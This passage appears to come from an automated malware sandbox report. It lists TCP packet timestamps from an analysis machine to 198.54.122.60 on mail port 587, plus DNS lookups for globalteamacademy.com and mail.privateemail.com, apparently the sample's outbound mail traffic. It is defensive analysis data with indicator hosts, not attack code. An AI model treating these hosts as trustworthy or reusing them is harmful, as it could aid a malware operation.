                                                                              Feb 8, 2021 10:29:41.808464050 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:41.808681965 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:41.811137915 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:41.811299086 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:41.997153997 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:41.997199059 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:41.997433901 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:41.998980999 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:41.999037027 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:41.999105930 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:41.999155045 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.185286999 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.185333014 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.185359001 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.185461044 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.185568094 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.185612917 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.187055111 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.187156916 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.187171936 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.187218904 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.187755108 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.373416901 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373446941 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373455048 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373482943 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373495102 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373502016 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373509884 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373644114 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373656988 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373728037 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.373740911 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.374108076 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.374823093 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.374839067 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.375221014 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.375252962 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.375332117 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.375344038 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.375767946 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.375787973 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:42.561733961 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.565166950 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.573651075 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:42.784192085 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:49.160001993 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:49.347681999 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:49.348205090 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:49.348237038 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:49.348395109 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:49.349519014 CET49172587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:49.445662022 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:49.537115097 CET58749172198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:49.636307955 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:49.636428118 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:49.827069044 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:49.827635050 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.016150951 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.016246080 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.016700029 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.206713915 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.207703114 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.396691084 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.396796942 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.399539948 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.408282042 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.587984085 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.588020086 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.596612930 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.597529888 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.598376036 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.786859035 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.787924051 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.788548946 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:50.976921082 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.979660988 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:50.980225086 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.169883013 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.171977043 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.172596931 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.360846996 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.382618904 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.383081913 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.571739912 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.572128057 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.573002100 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.573188066 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.573329926 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.573497057 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.577825069 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.761326075 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.761348009 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.761435986 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.761544943 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.761692047 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.761771917 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.766191006 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.766284943 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.949831009 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.950016022 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.950098038 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.950149059 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.954588890 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.954607010 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:51.954772949 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:51.954823017 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.139307022 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.139349937 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.139668941 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.143204927 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.143234968 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.143405914 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.143481016 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.328327894 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.328377008 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.328402996 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.328428984 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.328454971 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.328619957 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.328665972 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.331898928 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.331942081 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.331967115 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.331993103 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.332019091 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.332043886 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.332093000 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.333398104 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.517549992 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517596006 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517625093 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517651081 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517677069 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517703056 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517729044 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517754078 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.517818928 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.519026041 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.520499945 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.520529985 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.520555973 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.521758080 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.521785975 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.521795034 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.521975994 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.522003889 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.522027969 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.522084951 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.522155046 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.522222042 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.522248030 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.522463083 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:52.706403971 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707515001 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707545042 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707608938 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707699060 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707745075 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707763910 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707781076 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.707869053 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710129023 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710167885 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710282087 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710311890 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710536003 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710566044 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710652113 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710680008 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.710705996 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.719321012 CET58749173198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:52.925194025 CET49173587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:55.951189995 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:56.140196085 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.140393972 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:56.330127954 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.330699921 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:56.519062042 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.519401073 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.519946098 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:56.711216927 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.712203026 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:56.900744915 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.900789022 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:56.903156996 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:56.911477089 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:57.091625929 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.091670036 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.099910021 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.100493908 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.100975990 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:57.289424896 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.290549994 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.291896105 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:57.481990099 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.484390974 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.485194921 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:57.676004887 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.678432941 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.678896904 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:57.867486000 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.887758017 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:57.888561964 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.077202082 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.077580929 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.078635931 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.079135895 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.079385042 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.079657078 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.087639093 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.267128944 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.267376900 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.267550945 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.267724037 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.268040895 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.268151999 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.276201963 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.276405096 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.455928087 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.456180096 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.456523895 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.456633091 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.464929104 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.464967966 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.465089083 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.647295952 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.647353888 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.647567987 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.656095028 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.656380892 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.836231947 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.836307049 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.836353064 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.836390972 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.836425066 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.836461067 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.836576939 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.836627960 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.836653948 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.844806910 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.844949961 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:58.845118999 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.845261097 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.845319033 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.845356941 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:58.846040964 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.025181055 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025289059 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025353909 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025456905 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025479078 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.025543928 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025579929 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025614023 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025649071 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025841951 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025902987 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.025938988 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.026978016 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.033638954 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.033675909 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.033835888 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.033873081 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.034512043 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.034544945 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.034631014 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.034682989 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.034723043 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.034892082 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.035109043 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.035207033 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.035242081 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.035264969 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.035305977 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.035341024 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.035375118 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.035445929 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.035650969 CET49174587192.168.2.22198.54.122.60
                                                                              Feb 8, 2021 10:29:59.214046001 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215523958 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215603113 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215655088 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215682030 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215723991 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215765953 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215794086 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215918064 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.215943098 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.223854065 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.223970890 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224008083 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224037886 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224062920 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224143982 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224265099 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224463940 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224540949 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.224663019 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.233002901 CET58749174198.54.122.60192.168.2.22
                                                                              Feb 8, 2021 10:29:59.430957079 CET49174587192.168.2.22198.54.122.60

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Feb 8, 2021 10:28:18.120815992 CET5219753192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:28:18.410446882 CET53521978.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:15.805115938 CET5309953192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:15.868436098 CET53530998.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:21.925395012 CET5283853192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:21.982553005 CET53528388.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:21.983606100 CET5283853192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:22.033673048 CET53528388.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:23.864960909 CET6120053192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:23.924849987 CET53612008.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:23.938626051 CET4954853192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:24.000092983 CET53495488.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:29.920811892 CET5562753192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:29.969630957 CET53556278.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:39.189776897 CET5600953192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:39.251398087 CET53560098.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:49.391611099 CET6186553192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:49.443464994 CET53618658.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:55.834018946 CET5517153192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:55.891032934 CET53551718.8.8.8192.168.2.22
                                                                              Feb 8, 2021 10:29:55.891953945 CET5517153192.168.2.228.8.8.8
                                                                              Feb 8, 2021 10:29:55.948849916 CET53551718.8.8.8192.168.2.22

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Feb 8, 2021 10:28:18.120815992 CET192.168.2.228.8.8.80x51f2Standard query (0)globalteamacademy.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:15.805115938 CET192.168.2.228.8.8.80x651cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:21.925395012 CET192.168.2.228.8.8.80x8b18Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:21.983606100 CET192.168.2.228.8.8.80x8b18Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                              Feb 8, 2021 10:29:29.920811892 CET192.168.2.228.8.8.80x12a7Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
